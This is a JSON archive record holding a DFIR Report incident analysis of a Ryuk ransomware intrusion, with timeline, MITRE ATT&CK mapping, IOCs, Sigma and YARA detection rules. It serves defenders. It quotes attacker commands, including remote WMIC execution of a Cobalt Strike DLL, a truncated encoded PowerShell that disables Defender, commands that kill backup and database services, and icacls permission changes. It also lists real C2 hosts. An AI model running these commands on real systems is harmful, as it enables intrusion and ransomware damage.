{
	"id": "e2d7a86b-ede8-4107-88f2-d7b2dba5dd71",
	"created_at": "2026-04-06T00:20:14.759902Z",
	"updated_at": "2026-04-10T13:11:46.931782Z",
	"deleted_at": null,
	"sha1_hash": "3b496fa37a1d7a0f3a9480971f7cd95643956604",
	"title": "Ryuk's Return",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1648329,
	"plain_text": "Ryuk's Return\r\nBy editor\r\nPublished: 2020-10-08 · Archived: 2026-04-05 21:55:33 UTC\r\nIntro\r\nThe Ryuk group went from an email to domain wide ransomware in 29 hours and asked for over $6 million to unlock our\r\nsystems. They used tools such as Cobalt Strike, AdFind, WMI, vsftpd, PowerShell, PowerView, and Rubeus to accomplish\r\ntheir objective.\r\nRyuk has been one of the most proficient ransomware gangs in the past few years, with the FBI claiming $61 million USD\r\nhaving been paid to the group as of February 2020. Earlier in the year, the group grew a little quiet, but that seems to have\r\nchanged in the past few weeks, with incidents like what occurred at UHS hospitals.\r\nCase Summary\r\nIn this case, the actions began via a loader malware known as Bazar/Kegtap. Reports indicate an email delivery via\r\nmalspam, which has been creeping up in volume over the month of September.\r\nFrom the initial execution of the payload, Bazar injects into various processes including explorer.exe and svchost.exe, as\r\nwell as, spawning cmd.exe processes. The initial goal of this activity was to run discovery using built in Windows utilities\r\nlike nltest, net group, and the 3rd party utility AdFind.\r\nAfter the initial discovery activity the Bazar malware stayed relatively quiet, until a second round of discovery the following\r\nday. Again, the same tools were employed in the second round of discovery, plus Rubeus. This time the discovery collection\r\nwas exfiltrated via FTP to a server hosted in Russia. Next, the threat actor began to move laterally.\r\nIt took a few attempts, using various methods, from remote WMI, to remote service execution with PowerShell, until finally\r\nlanding on Cobalt Strike beacon executable files transferred over SMB to move around the environment. From here forward,\r\nthe threat actors relied on a Cobalt Strike beacon running on a domain controller as their main operations point.\r\nAfter picking the most reliable method to move through the environment, the threat actor then proceeded to establish\r\nbeacons across the enterprise. In preparation for their final objectives, they used PowerShell to disable Windows Defender in\r\nthe environment.\r\nThe server utilized for backups in the domain was targeted first for encryption, with some further preparation completed on\r\nthe host. However, once the Ryuk ransom executable was transferred over SMB from their domain controller (DC) pivot, it\r\nonly took one minute to execute it.\r\nAt this point Ryuk was transferred to the rest of the hosts in the environment via SMB and executed through an RDP\r\nconnection from the pivot domain controller. In total, the campaign lasted 29 hours–from initial execution of the Bazar, to\r\ndomain wide ransomware. If a defender missed the first day of recon, they would have had a little over 3 hours to respond\r\nbefore being ransomed.\r\nThe threat actors requested 600+ bitcoins, which have a market value of around 6+ million USD.\r\nTimeline\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 1 of 15\n\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 2 of 15\n\nFor a full breakdown of the technical details and threat actor tactics, techniques, and procedures continue into the MITRE\r\nATT\u0026CK breakdown.\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nInitial delivery was via email with a link to the Bazar/Kegtap backdoor loader. We downloaded and ran Document-Preview.exe, which connected to 5.182.210[.]145 over 443/https.\r\nExecution\r\nService execution was used several times to execute scripts and executables during lateral movement.\r\nWMI was used as well in an attempt to execute dlls laterally.\r\nWMIC /node:\"DC.example.domain\" process call create \"rundll32 C:\\PerfLogs\\arti64.dll, StartW\"\r\nThe threat actors also performed process injection.\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 3 of 15\n\nDefense Evasion\r\nDisabling Windows Defender.\r\npowershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAb\r\nDiscovery\r\nDay 1\r\nAdFind and adf.bat were dropped and run minutes after Document-Preview.exe was executed. We’ve seen adf.bat numerous\r\ntimes and you can read more about it here. The batch file outputs information into the following text files.\r\nNltest was used to check for Domain trusts\r\nnltest /domain_trusts /all_trusts\r\nNet was used to show Domain Admins\r\nnet group \"Domain admins\" /DOMAIN\r\nPing was used to test if systems were up in the environment\r\nping hostname.domain.local\r\nBreak down of the process tree of activity from the Bazar loader on day 1.\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 4 of 15\n\nDay 2\r\nAfind was run again, and then the threat actor attempted to Kerberoast using Rubeus.\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 5 of 15\n\nAfter a few false starts during lateral movement failures, the threat actors performed some additional local system recon.\r\nsysteminfo\r\nnltest /dclist:\r\nGet-NetSubnet\r\nGet-NetComputer -operatingsystem *server*\r\nInvoke-CheckLocalAdminAccess\r\nFind-LocalAdminAccess\r\nWMI was used to check for the current AntiVirus on numerous systems\r\nWMIC /Node:localhost /Namespace:\\\\\\\\root\\\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List\r\nImport-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostNa\r\nLateral Movement\r\nOn day 1 the threat actors checked a domain controller for MS17-010 before continuing with more discovery. The system\r\nwas not vulnerable to MS17-010 \r\nLateral movement began around 28 hours after initial entry, using SMB to drop a Cobalt Strike Beacon on a domain\r\ncontroller. From there, the threat actor used WMIC to execute the beacon.\r\nWMIC /node:\\\"DC.example.domain\\\" process call create \\\"rundll32 C:\\\\PerfLogs\\\\arti64.dll, StartW\\\"\r\nThis payload did not appear to run successfully, as shortly after the threat actors dropped an additional payload on the\r\nbeachhead host, and then executed a service on the DC, after no command and control traffic was apparent.\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 6 of 15\n\nThe decoded Powershell.\r\nFollowing this, the treat actors copied and executed a Cobalt Strike beacon executable and initiated it via a service on the\r\ndomain controller.\r\nAt this point, C2 connections appear on the domain controller connecting to martahzz[.]com – 88.119.171[.]75 over\r\n443/https. \r\nBackup systems were targeted for lateral movement using the SMB exe executed around one hour after the first lateral\r\nmovement execution from the beachhead host.\r\nThe threat actor was having issues running beacons on numerous systems, and on at least one of the systems, they mounted\r\nthe drive remotely.\r\nC:\\Windows\\system32\\cmd.exe /C dir \\\\Server\\c$\r\nCommand and Control\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 7 of 15\n\nBazar:\r\n5.182.210.145|443\r\nCertificate [ec:4c:07:b8:3b:6a:a0:bf:60:36:b7:f4:92:9e:83:81:0f:96:46:b0 ]\r\nNot Before 2020/09/21 05:24:24 UTC\r\nNot After 2021/09/21 05:24:24 UTC\r\nIssuer Org Global Security\r\nSubject Common example.com\r\nSubject Org Global Security\r\nPublic Algorithm rsaEncryption\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: e35df3e00ca4ef31d42b34bebaa2f86e\r\nCobalt strike:\r\n88.119.171.75|443\r\nCertificate [ee:92:91:6b:7e:31:85:22:65:eb:16:11:c4:8f:0a:75:c9:05:1d:4b ]\r\nNot Before 2020/09/29 08:18:03 UTC\r\nNot After 2021/09/29 08:18:03 UTC\r\nIssuer Org lol\r\nSubject Common martahzz.com\r\nSubject Org lol\r\nPublic Algorithm rsaEncryption\r\nJA3 : a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\n107.173.58.183|443\r\nCertificate [e2:13:2c:a4:29:ae:f3:fa:35:1f:e1:5b:2c:25:76:57:37:5b:dc:35 ]\r\nNot Before 2020/09/22 14:34:11 UTC\r\nNot After 2021/09/22 14:34:11 UTC\r\nIssuer Org lol\r\nSubject Common nomadfunclub.com\r\nSubject Org lol\r\nPublic Algorithm rsaEncryption\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nExfiltration\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 8 of 15\n\nDomain discovery (AdFind and Rubeus outputs) exfiltrated by vsftpd to 45.141.84[.]120. \r\nImpact\r\nSMB was used to transfer the Ryuk executables. Then, RDP connections were made from the first compromised DC, and\r\nthen, ransomware executed throughout the environment, starting with the Backup servers. On the backup server, prior to\r\nexecution, the threat actors pulled up the wbadmin msc console.\r\nCommands ran prior to ransom execution:\r\n\"C:\\Windows\\system32\\net1 stop \\\"\"samss\\\"\" /y\"\r\n\"C:\\Windows\\system32\\net1 stop \\\"\"veeamcatalogsvc\\\"\" /y\"\r\n\"C:\\Windows\\system32\\net1 stop \\\"\"veeamcloudsvc\\\"\" /y\"\r\n\"C:\\Windows\\system32\\net1 stop \\\"\"veeamdeploysvc\\\"\" /y\"\r\n\"C:\\Windows\\System32\\net.exe\\\"\" stop \\\"\"samss\\\"\" /y\"\r\n\"C:\\Windows\\System32\\net.exe\\\"\" stop \\\"\"veeamcatalogsvc\\\"\" /y\"\r\n\"C:\\Windows\\System32\\net.exe\\\"\" stop \\\"\"veeamcloudsvc\\\"\" /y\"\r\n\"C:\\Windows\\System32\\net.exe\\\"\" stop \\\"\"veeamdeploysvc\\\"\" /y\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM sqlbrowser.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM sqlceip.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM sqlservr.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM sqlwriter.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.agent.configurationservice.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.brokerservice.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.catalogdataservice.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.cloudservice.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.externalinfrastructure.dbprovider.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.manager.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.mountservice.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.service.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.uiserver.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.wmiserver.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeamdeploymentsvc.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeamfilesysvsssvc.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.guest.interaction.proxy.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeamnfssvc.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeamtransportsvc.exe /F\"\r\n\"C:\\Windows\\system32\\taskmgr.exe\\\"\" /4\"\r\n\"C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding\"\r\n\"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding\"\r\n\"icacls \\\"\"C:\\*\\\"\" /grant Everyone:F /T /C /Q\"\r\n\"icacls \\\"\"D:\\*\\\"\" /grant Everyone:F /T /C /Q\"\r\nAll systems were left with the following ransom note:\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 9 of 15\n\nThe threat actors asked for more than $6 million but were willing to negotiate.\r\nEnjoy our report? Please consider donating $1 or more to the project using Patreon. Thank you for your support!\r\nWe also have PCAPs, files, memory images, Kape and Redline packages available here.\r\nIOCs\r\nhttps://otx.alienvault.com/pulse/5f7f039322d638212355d28a\r\nhttps://misppriv.circl.lu/events/view/79958\r\nNetwork\r\n5.182.210.145\r\n88.119.171.75\r\n107.173.58.183\r\n45.141.84.120\r\nnomadfunclub.com\r\nmartahzz.com\r\n.bazar\r\nFile\r\nDocument-Preview.exe\r\n40b17d4ca83f079cf6b2b09d7a7fd839\r\n090e82a47b32dc94d71d4c84a3a76d2480589b00\r\n85ef348d39610c1d5f58e2524c0e929ec815a9fbe1f5924cdef7a0c05e58e5ad\r\nc5af8f6ae345f453442a3bbe8189c42ad3c7d4d89231607f78a1b6f24173679e38ac08d26294f46de98358b0aa560f33be5708becd2a63\r\n6144:HF5dJ89Rl3FtuK0cuVxtIIOxK6xOMjKBxMkUcYBMcoPRxDu3fXtjpamF:HFp4Rl36KNoxwxNmBWcYBhdlpF\r\nfx16_multi_for_crypt_x86.exe\r\nfc9f8bf3fcae4bf65150bff296b5e271\r\n308261d2539dba9814aa28c458970beb00cc2864\r\nf7998c8b083b31e8b0e8eaf197f6db65b100d44d94700e0780e81c7d54eefcf5\r\n4f60d3a0ca16242a3916675f93d16ee29f423d46deef81cad6da32c325d261cf204e94baf958383305dd3df33900d913676fd104c70a4c\r\n3072:AWh32QAodpLae6PEd0YstWTWlbkPn3aT3TFw:Jh32QAod5ae6P9YstVr\r\narti64.dll\r\nfc646e042c545be6f7e5bdcb3ecf64c7\r\nb5cdf571944f889e4369329aa01376e2204c01f0\r\nf22449c01f8233ea7c85a49f2b6b5fedd304fca5c0e58176bafda9218873c2dd\r\n8ddc48f4c5db09fc60053554487708fa5226e253edb64ace9e6fa0c3ea370df1bfd8e994cab0822feac494d71d7d730926738c902b3788\r\n6144:4MB168YZHFXFxaSjx9nDPAhgaa0rEAmrSWLeLITo0:4MB168UlraSzrAhY+EAwSp0\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 10 of 15\n\nP64.exe\r\n9ff18f7a19e06b602e19b9e0aca3ad84\r\nbcbb5bbc55b4f44397c34e9fca2017587e69219b\r\n9d8cbb2bf4801276de2143ccd64a7d0f66263809a90bea0b664282a15d121d9e\r\n157b06e75a3977e80866058111768508c643ccea681cf324d770865b3b1d354e233088b2391020f2e988f650344e263e8b9b0fcbc8c70a\r\n6144:Y52fXQtuKHZg9i/uu3cJfWCcIzZzvvnpPWyxXf7uByC:YmQtuKHP/AJuKZvVWmicadf.bat\r\nadf.bat\r\nb94bb0ae5a8a029ba2fbb47d055e22bd\r\n035940bd120a72e2da1b6b7bb8b4efab46232761\r\nf6a377ba145a5503b5eb942d17645502eddf3a619d26a7b60df80a345917aaa2\r\na8e5b535711268a0b82988259fbedc0211e0e55b5bf2d16ddcc21dae82f0312e178faee1b39ebec7fba5db4e36d9ad9618eae5c3a39a35\r\n6:81ykqi23fVxJfke9Nm0Lal9c9Nmw+IFc9NQ0LbyqAc9NCR+KsEc9NamWM5c9Nm0e:KqZxiZlpBIG21sSmz8yT1V\r\nDetections\r\nNetwork\r\nET INFO Observed DNS Query for EmerDNS_TLD (.bazar)\r\nETPRO POLICY Possibly Suspicious example.com SSL Cert\r\nET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)\r\nETPRO TROJAN Observed Malicious SSL Cert (Cobalt Strike CnC)\r\nFeodo Tracker: potential TrickBot CnC Traffic_detected\r\nET NETBIOS DCERPC SVCCTL - Remote Service Control Manager Access\r\nET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SMB2 NT Create AndX Request For an Executable File In a Temp Directory\r\nET POLICY RunDll Request Over SMB - Likely Lateral Movement\r\nGPL NETBIOS SMB-DS IPC$ share access\r\nET CNC Feodo Tracker Reported CnC Server TCP group 15\r\nET EXPLOIT Possible ETERNALBLUE Probe MS17-010 (Generic Flags)\r\nET EXPLOIT Possible ETERNALBLUE Probe MS17-010 (MSF style)\r\nET POLICY Command Shell Activity Over SMB - Possible Lateral Movement\r\nSigma\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_powershell_suspicious_parameter_variation.yml\r\nhttps://github.com/Neo23x0/sigma/blob/82cae6d63c9c2f6d3e86c57e11497d86279b9f95/rules/windows/process_creation/win_susp_wmi_ex\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/other/win_defender_disabled.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/malware/win_mal_ryuk.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/powershell/powershell_shellcode_b64.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_shadow_copies_deletion.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_net_execution.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_whoami.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_wmi_execution.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_trust_discovery.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_whoami_as_system.yml\r\nDetects AdFind usage from a past case:\r\ntitle: AdFind Recon\r\ndescription: Threat Actor using AdFind for reconnaissance.\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 11 of 15\n\nauthor: The DFIR Report\r\ndate: 2019/8/2\r\nreferences:\r\n - https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\r\ntags:\r\n - attack.remote_system_discovery\r\n - attack.T1018\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection_1:\r\n CommandLine|contains:\r\n - adfind -f objectcategory=computer\r\n selection_2:\r\n CommandLine|contains:\r\n - adfind -gcb -sc trustdmp\r\n condition: selection_1 or selection_2\r\nfalsepositives:\r\n - Legitimate Administrator using tool for Active Directory querying\r\nlevel: medium\r\nstatus: experimental\r\nYara\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2020-10-04\r\nIdentifier: exes\r\nReference: https://thedfirreport.com\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule ryuk_exes_P64 {\r\nmeta:\r\ndescription = \"exes - file P64.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2020-10-04\"\r\nhash1 = \"9d8cbb2bf4801276de2143ccd64a7d0f66263809a90bea0b664282a15d121d9e\"\r\nstrings:\r\n$s1 = \"MultiReco.exe\" fullword ascii\r\n$s2 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s3 = \"B:\\\\x64\\\\cpp\\\\x64\\\\Release\\\\MultiReco.pdb\" fullword ascii\r\n$s4 = \"AppPolicyGetThreadInitializationType\" fullword ascii\r\n$s5 = \"`template-parameter-\" fullword ascii\r\n$s6 = \"Error initializing the common controls.\" fullword wide\r\n$s7 = \"Error reading data from the file.\" fullword wide\r\n$s8 = \"operator\u003c=\u003e\" fullword ascii\r\n$s9 = \"operator co_await\" fullword ascii\r\n$s10 = \"AppPolicyGetWindowingModel\" fullword ascii\r\n$s11 = \"AppPolicyGetShowDeveloperDiagnostic\" fullword ascii\r\n$s12 = \"noexcept\" fullword ascii\r\n$s13 = \"Error opening the file!\" fullword wide\r\n$s14 = \"Error creating the window\" fullword wide\r\n$s15 = \"Error creating new stroke collection.\" fullword wide\r\n$s16 = \"Failed connect to the recognition context's event source.\" fullword wide\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 12 of 15\n\n$s17 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s18 = \"Failed to add the strokes to the Ink object's custom stroke collection\" fullword wide\r\n$s19 = \"Failed to attach the stroke collection to the recognition context\" fullword wide\r\n$s20 = \"Error loading ink object from the file.\" fullword wide\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n( pe.imphash() == \"c30bbd53e939306589cfb6ee8f94434f\" and pe.exports(\"SDqwsgrfTRRADQDSwatuHdfCxv\") or all of th\r\n}\r\nrule ryuk_exes_arti64 {\r\nmeta:\r\ndescription = \"exes - file arti64.dll\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2020-10-04\"\r\nhash1 = \"f22449c01f8233ea7c85a49f2b6b5fedd304fca5c0e58176bafda9218873c2dd\"\r\nstrings:\r\n$s1 = \"PluginSample.dll\" fullword ascii\r\n$s2 = \"B:\\\\x32\\\\dll\\\\x64\\\\Release\\\\PluginSample.pdb\" fullword ascii\r\n$s3 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s4 = \"AcquireSamplePlugin::DisplayConfigureDialog\" fullword wide\r\n$s5 = \"AppPolicyGetThreadInitializationType\" fullword ascii\r\n$s6 = \"`template-parameter-\" fullword ascii\r\n$s7 = \"operator\u003c=\u003e\" fullword ascii\r\n$s8 = \"operator co_await\" fullword ascii\r\n$s9 = \"AppPolicyGetWindowingModel\" fullword ascii\r\n$s10 = \"Transfer Completed Successfully!\" fullword wide\r\n$s11 = \"AppPolicyGetShowDeveloperDiagnostic\" fullword ascii\r\n$s12 = \"noexcept\" fullword ascii\r\n$s13 = \"Read-Only Photo Acquire Plugin\" fullword wide\r\n$s14 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s15 = \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Photo Acquisition\\\\Plugins\\\\%ws\" fullword wide\r\n$s16 = \".?AUIUserInputString@@\" fullword ascii\r\n$s17 = \"CLSID\\\\%ws\\\\InprocServer32\" fullword wide\r\n$s18 = \"`generic-type-\" fullword ascii\r\n$s19 = \"e\u003e_eUsEi+H\u003cCc%RZtSC7QIt*HvDb68Pj3\" fullword ascii\r\n$s20 = \"Default Plugin Text\" fullword wide\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n( pe.imphash() == \"0fd22f187f22ab4ec2eb55f91ccefa7a\" and ( pe.exports(\"StartW\") and pe.exports(\"TREWDGGegrfgye\r\n}\r\nrule ryuk_fx16_multi_for_crypt_x86 {\r\nmeta:\r\ndescription = \"exes - file fx16_multi_for_crypt_x86.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2020-10-04\"\r\nhash1 = \"f7998c8b083b31e8b0e8eaf197f6db65b100d44d94700e0780e81c7d54eefcf5\"\r\nstrings:\r\n$s1 = \"LuxIsnXwkvavqUaBlcqjWmmutckYHRjvSmOKvtRMwvSKnQMiJqUoYEcMzIANnFlVcyliOfiiaTsMnNWaNDDONiTDSmFdkCUOhbbwDEt\r\n$s2 = \"TYthgQVhYkfpnSlftPAzcdzAqVSlhPTZHjIthwkQuhrUvkIDilbaqJbwDZbiXcgGuIDIhJeCGXdfluoqjoelRuZNFWqNIPBiOgpChjN\r\n$s3 = \"IEOffhhLBexvIlCbvoQaZljxwWNMTczTsCUzgDpMsHSPyQIttHUgFUPadSIhtBYFrQNAKZiSvJglfknwqRoUxuuxWCwCwnQyVPAPhgl\r\n$s4 = \"fVHNcZJdHEkcoMdCUvMUMRzbsdjHdGdTFmIoZXWDQHBQNYzPNEiAjdsYtHBlIxyoWwSoDVwnfFTXxZGBUpsegUPrEANCvrQCzqCFQbc\r\n$s5 = \"cXuNyWQgbFQlughZovoZDwAHHWvWqeZlfFKFKfxwAmWWlHOpKoSdnbPehKrooTcWjrYuZJjVAYkxMVwuBLkaFVpdnsJeQZvEmoJchvj\r\n$s6 = \"sjDUCMurdFjEkVRmOZHRYtajSNmSgxfmnvUnJmJgDGGsqEOeCADepuzBzinLnjnAfiZWzVrWstXexwCczXQwTpxzeXAhJTByziBxWCY\r\n$s7 = \"GgcaduyeETNVsnybynUUywlxcoamtRlealYeLGXbpXBDTEJYavXdJAryMLCsZKrffWnBgAdGhLxqrgRebcImIXNEafCYCgEtaXsWdWi\r\n$s8 = \"ixtoVSYMk@dzN`TJ\\\\vtGVyqa|P{YGow|%\" fullword ascii\r\n$s9 = \"`w@p]H`suAVER\\\\~l^sG\" fullword ascii\r\n$s10 = \"Picuovphv Bbsg!Es|rwojrarkkd Stryjfes x4.3\" fullword ascii\r\n$s11 = \"\\\"YIWKqFIIAtSmNnwAnddonItdsMfDKcuoHBBWdeTMCFrlJJEFJzRIlaHAxjdKiWQkAnlaGHbAlIk}*1}TqVzGTDaqlaDozCvbwgtl\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 13 of 15\n\n$s12 = \"OhqMCeeltSHDtTWKtVLmEURx'kz y\\\"7\" fullword ascii\r\n$s13 = \"FrystFsgcteIaui\" fullword ascii\r\n$s14 = \"JJaZFfGMWkYZvWZVgeqjvEBRIOmpsPZnmqGtsbupUOlsQicTzEmJbveDkpsVrglajErQAxMvSxFydAdbEPwlBqDgZyBPTIGtmkHiVm\r\n$s15 = \"HiaqQCPQHIAFgVRMdAUUmtLWGbUVlQRcTWvjUBTLYpoEHeBDNWCMIlBrjIsSlNmHWUKjMFeEkPJkeGftHCUVKGwLckfhIYNcNhXudK\r\n$s16 = \"FrystDdswirfCqovf{vD\" fullword ascii\r\n$s17 = \"QvehbLauVGuTdFKhOKGSIwAgBxTFhkGiZRyBVMqFXKegVZQPPOQdrrZwuNewAYNzDiznmhdgyiovipThWdtgnIldoRbAaaIXUbmtlR\r\n$s18 = \"nFDnFOWGPuHyRcKShALUFIaVlXXwURYhHjhnRpCOuupuuBaIKJDbcbeAjHlojxJHKLrkQMmVvLSiLbRUBFigsUWkXCYiXstkJLZOJh\r\n$s19 = \"CtJHYQXcJSNgHqnKRdZhxKPMQvZYXQZsgrwtQStObwzMfbjjyaXlDNoxVclplvGxkoQlIKsSJZOVRJzlxaMrMCkoodjKxHuGbgXhEz\r\n$s20 = \"`EwSCLyaEZUPQuJBXob\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 400KB and\r\n( pe.imphash() == \"2ce62b0c0226079a88a01c701dbee7b9\" or 8 of them )\r\n}\r\nrule ryuk_Document_Preview {\r\nmeta:\r\ndescription = \"exes - file Document-Preview.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2020-10-04\"\r\nhash1 = \"85ef348d39610c1d5f58e2524c0e929ec815a9fbe1f5924cdef7a0c05e58e5ad\"\r\nstrings:\r\n$s1 = \"MultiReco.exe\" fullword ascii\r\n$s2 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s3 = \"Error initializing the common controls.\" fullword wide\r\n$s4 = \"Error reading data from the file.\" fullword wide\r\n$s5 = \"operator\u003c=\u003e\" fullword ascii\r\n$s6 = \"operator co_await\" fullword ascii\r\n$s7 = \"Error opening the file!\" fullword wide\r\n$s8 = \"Error creating the window\" fullword wide\r\n$s9 = \"Error creating new stroke collection.\" fullword wide\r\n$s10 = \"Failed connect to the recognition context's event source.\" fullword wide\r\n$s11 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s12 = \"Failed to attach the stroke collection to the recognition context\" fullword wide\r\n$s13 = \"Failed to add the strokes to the Ink object's custom stroke collection\" fullword wide\r\n$s14 = \"Error loading ink object from the file.\" fullword wide\r\n$s15 = \"You need to have at least one in order to run this sample.\" fullword wide\r\n$s16 = \"Failed to create a unique string id for the stroke collection\" fullword wide\r\n$s17 = \"Recognition has failed. No results will be stored in the stroke collection.\" fullword wide\r\n$s18 = \"*- *[Cv\" fullword ascii\r\n$s19 = \"ggDeA08\" fullword ascii\r\n$s20 = \"qtwmuy2\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 1000KB and\r\n( pe.imphash() == \"274676f64ec63375a7825a17a44cba07\" and pe.exports(\"SDqwsgrfTRRADQDSwatuHdfCxv\") or 8 of them\r\n}\r\nIf you have detections you would like to add to this section, please contact us and we will credit you.\r\nMITRE\r\nUser Execution – T1204\r\nWindows Management Instrumentation – T1047\r\nService Execution – T1035\r\nScripting – T1064\r\nPowerShell – T1086\r\nRundll32 – T1085\r\nProcess Injection – T1055\r\nValid Accounts – T1078\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 14 of 15\n\nDisabling Security Tools – T1089\r\nAccount Discovery – T1087\r\nDomain Trust Discovery – T1482\r\nNetwork Service Scanning – T1046\r\nQuery Registry – T1012\r\nRemote System Discovery – T1018\r\nSecurity Software Discovery – T1063\r\nRemote Services – T1021\r\nCommonly Used Port – T1043\r\nStandard Application Layer Protocol – T1071\r\nData Encrypted for Impact – T1486\r\n(internal case 1005)\r\nSource: https://thedfirreport.com/2020/10/08/ryuks-return/\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2020/10/08/ryuks-return/"
	],
	"report_names": [
		"ryuks-return"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434814,
	"ts_updated_at": 1775826706,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
